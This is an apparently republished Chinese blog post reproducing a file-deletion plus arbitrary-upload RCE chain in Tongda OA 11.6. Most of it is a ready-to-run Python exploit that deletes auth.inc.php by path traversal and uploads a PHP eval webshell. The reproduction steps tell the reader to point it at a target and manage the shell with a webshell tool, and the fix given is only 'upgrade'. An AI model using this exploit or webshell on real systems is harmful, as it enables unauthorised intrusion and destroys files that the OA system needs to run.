700字范文,内容丰富有趣,生活中的好帮手!
700字范文 > [ 漏洞复现篇 ]通达 OA11.6 文件删除 + 任意文件上传 rce 漏洞复现

[ 漏洞复现篇 ]通达 OA11.6 文件删除 + 任意文件上传 rce 漏洞复现

时间:2018-11-26 11:55:11

相关推荐

[ 漏洞复现篇 ]通达 OA11.6 文件删除 + 任意文件上传 rce 漏洞复现

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是_PowerShell,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

目录

🍬 博主介绍

1. 漏洞简介

2.漏洞影响版本

3. 漏洞环境搭建

4. 漏洞复现

5. Exp

6.漏洞修复

1. 漏洞简介

通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。

该exp会删除uth.inc.php文件可能回损害oa系统。

2.漏洞影响版本

本漏洞是任意文件删除配合任意文件上传RCE,通达OA高危漏洞影响版本:

文件删除漏洞:通达OA V11.6

任意文件上传:通达OA < V11.7

3. 漏洞环境搭建

/s/1aTYkCD2EolqRUGIGA80aAg?pwd=ujin

通达OA安装包为11.6版本

4. 漏洞复现

将exp中的target替换为目标url

Payload替换为自己的木马即可

然后使用webshell管理工具即可

5. Exp

本POC不是无损利用的,会让对方系统文件被删除导致无法正常工作

并且由于目标系统及网络环境不可控,该漏洞也不可能编写出在任何情况下都完全无损的

EXP使用时请一定一定要慎重,一定要获取对方书面授权再使用如果仅仅想要检测漏洞的存在性

import requeststarget="http://localhost/"payload="<?php eval($_POST['hahaha']);?>"print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")input("Press enter to continue")print("[*]Deleting auth.inc.php....")url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"requests.get(url=url)print("[*]Checking if file deleted...")url=target+"/inc/auth.inc.php"page=requests.get(url=url).textif 'No input file specified.' not in page:print("[-]Failed to deleted auth.inc.php")exit(-1)print("[+]Successfully deleted auth.inc.php!")print("[*]Uploading payload...")url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"files = {'FILE1': ('deconf.php', payload)}requests.post(url=url,files=files)url=target+"/_deconf.php"page=requests.get(url=url).textif 'No input file specified.' not in page:print("[+]Filed Uploaded Successfully")print("[+]URL:",url)else:print("[-]Failed to upload file")

6.漏洞修复

升级官方最新版本

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。